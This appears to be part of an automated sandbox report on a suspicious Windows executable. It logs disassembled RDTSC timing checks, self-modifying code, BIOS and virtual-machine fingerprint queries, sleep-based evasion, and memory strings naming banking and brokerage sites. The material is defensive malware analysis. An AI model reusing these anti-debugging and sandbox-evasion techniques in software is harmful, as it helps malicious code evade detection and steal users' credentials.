                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720B53 second address: 5720B88 instructions: 0x00000000 rdtsc 0x00000002 call 00007F65CD2EDEF8h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, dx 0x0000000d popad 0x0000000e leave 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65CD2EDEEFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720B88 second address: 5720BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720BA5 second address: 5710008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007F65CD2EDEE2h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F65CD2EDEE7h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F65D1A5B4DBh 0x0000002a mov edi, edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710008 second address: 571000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571000C second address: 5710012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710012 second address: 5710022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710022 second address: 571006E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F65CD2EDEF6h 0x00000011 push eax 0x00000012 jmp 00007F65CD2EDEEBh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F65CD2EDEF5h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571006E second address: 571009B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65CC527CA7h 0x00000008 pop ecx 0x00000009 movsx ebx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dx, 7C10h 0x00000018 mov bh, 49h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571009B second address: 57100B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c pushad 0x0000000d mov esi, 79AE513Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 mov cl, 2Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571019B second address: 571021F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007F65CC527CA8h 0x00000013 adc cx, 5358h 0x00000018 jmp 00007F65CC527C9Bh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f pushfd 0x00000020 jmp 00007F65CC527CA9h 0x00000025 sbb ah, FFFFFFF6h 0x00000028 jmp 00007F65CC527CA1h 0x0000002d popfd 0x0000002e popad 0x0000002f sub edi, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571021F second address: 5710223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710223 second address: 571023B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571023B second address: 571025C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov cx, 86B7h 0x00000012 popad 0x00000013 test al, al 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571025C second address: 5710262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57102D0 second address: 57102D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57102D4 second address: 57102E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57102E8 second address: 5710352 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F65CD2EDEF4h 0x0000000f mov dword ptr [esp], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F65CD2EDEEDh 0x0000001b and al, 00000046h 0x0000001e jmp 00007F65CD2EDEF1h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F65CD2EDEF0h 0x0000002a sub si, 77E8h 0x0000002f jmp 00007F65CD2EDEEBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571038E second address: 5710392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710392 second address: 5710396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710396 second address: 571039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571039C second address: 57103AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57103AE second address: 57103EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007F65CC527CA7h 0x0000000f jg 00007F663C8B5D53h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F65CC527CA5h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57103EC second address: 571044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65CD2EDEF7h 0x00000008 mov ax, BA4Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F65CD2EDF76h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edi, 42157212h 0x0000001d pushfd 0x0000001e jmp 00007F65CD2EDEF3h 0x00000023 sbb si, 1A0Eh 0x00000028 jmp 00007F65CD2EDEF9h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571044F second address: 571046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571046D second address: 5710471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710471 second address: 5710477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710477 second address: 57104BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F663D67BEF4h 0x0000000f jmp 00007F65CD2EDEF0h 0x00000014 mov ebx, dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 mov bx, B830h 0x0000001c popad 0x0000001d lea eax, dword ptr [ebp-2Ch] 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F65CD2EDEEBh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104BE second address: 57104DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 jmp 00007F65CC527CA0h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104DC second address: 57104E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104E0 second address: 57104E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104E4 second address: 57104EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104EA second address: 5710500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527CA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710500 second address: 5710542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F65CD2EDEF6h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65CD2EDEF7h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710542 second address: 5710549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710549 second address: 57105AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov dh, ah 0x0000000b pushfd 0x0000000c jmp 00007F65CD2EDEF3h 0x00000011 and ch, 0000000Eh 0x00000014 jmp 00007F65CD2EDEF9h 0x00000019 popfd 0x0000001a popad 0x0000001b nop 0x0000001c jmp 00007F65CD2EDEEEh 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F65CD2EDEF7h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57105AF second address: 57105C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57105C7 second address: 57105F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F65CD2EDEEFh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710617 second address: 571061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571061B second address: 571061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571061F second address: 5710625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710625 second address: 5710682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F65CD2EDEF0h 0x0000000b or si, A038h 0x00000010 jmp 00007F65CD2EDEEBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, eax 0x0000001b jmp 00007F65CD2EDEF6h 0x00000020 test esi, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F65CD2EDEF7h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710682 second address: 571069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571069A second address: 5700707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F663D67BE99h 0x0000000e xor eax, eax 0x00000010 jmp 00007F65CD2C761Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d xor ebx, ebx 0x0000001f cmp eax, 00000000h 0x00000022 je 00007F65CD2EE043h 0x00000028 call 00007F65D1A4BA6Ch 0x0000002d mov edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5700707 second address: 570070B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 570070B second address: 570070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 570070F second address: 5700715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5700715 second address: 5700764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 382BF10Bh 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F65CD2EDEEEh 0x00000017 sbb esi, 3C735F18h 0x0000001d jmp 00007F65CD2EDEEBh 0x00000022 popfd 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F65CD2EDEF0h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5700764 second address: 5700776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5700776 second address: 57007AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F65CD2EDEF8h 0x00000011 call 00007F65CD2EDEF2h 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57007AE second address: 57007B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57007B4 second address: 57007B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57007B8 second address: 57007C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57007C8 second address: 57007E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5700882 second address: 5700888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5700888 second address: 570088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710B77 second address: 5710B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710B89 second address: 5710BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65CD2EDEF5h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710BB8 second address: 5710BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F663C8A5AC8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65CC527C9Dh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710BE2 second address: 5710BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710D17 second address: 5710D5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop eax 0x00000010 pushfd 0x00000011 jmp 00007F65CC527C9Fh 0x00000016 sub cx, 2F2Eh 0x0000001b jmp 00007F65CC527CA9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710D5F second address: 5710D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720BE7 second address: 5720C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, ch 0x0000000f mov di, 14FAh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720C0F second address: 5720C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEF7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720C2A second address: 5720C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720C2E second address: 5720C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F65CD2EDEF5h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65CD2EDEEDh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720C5D second address: 5720CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7F1E9812h 0x00000008 call 00007F65CC527CA3h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 mov di, ax 0x00000016 movzx ecx, bx 0x00000019 popad 0x0000001a mov dword ptr [esp], esi 0x0000001d pushad 0x0000001e push ebx 0x0000001f jmp 00007F65CC527CA2h 0x00000024 pop esi 0x00000025 mov si, bx 0x00000028 popad 0x00000029 mov esi, dword ptr [ebp+0Ch] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F65CC527CA3h 0x00000033 jmp 00007F65CC527CA3h 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F65CC527CA6h 0x00000041 jmp 00007F65CC527CA5h 0x00000046 popfd 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720CFC second address: 5720D1B instructions: 0x00000000 rdtsc 0x00000002 call 00007F65CD2EDEF0h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov di, D1C0h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720D1B second address: 5720D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720D1F second address: 5720D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 call 00007F65CD2EDEF5h 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720D3D second address: 5720DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F663C8952FAh 0x00000010 jmp 00007F65CC527C9Eh 0x00000015 cmp dword ptr [75AF459Ch], 05h 0x0000001c jmp 00007F65CC527CA0h 0x00000021 je 00007F663C8AD3AFh 0x00000027 jmp 00007F65CC527CA0h 0x0000002c xchg eax, esi 0x0000002d jmp 00007F65CC527CA0h 0x00000032 push eax 0x00000033 jmp 00007F65CC527C9Bh 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a movzx ecx, dx 0x0000003d push eax 0x0000003e push edx 0x0000003f movsx edi, ax 0x00000042 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSpecial instruction interceptor: First address: FC7824 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSpecial instruction interceptor: First address: FC7900 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSpecial instruction interceptor: First address: 11FA55C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe TID: 1476Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe TID: 1476Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513179164.000000000114C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
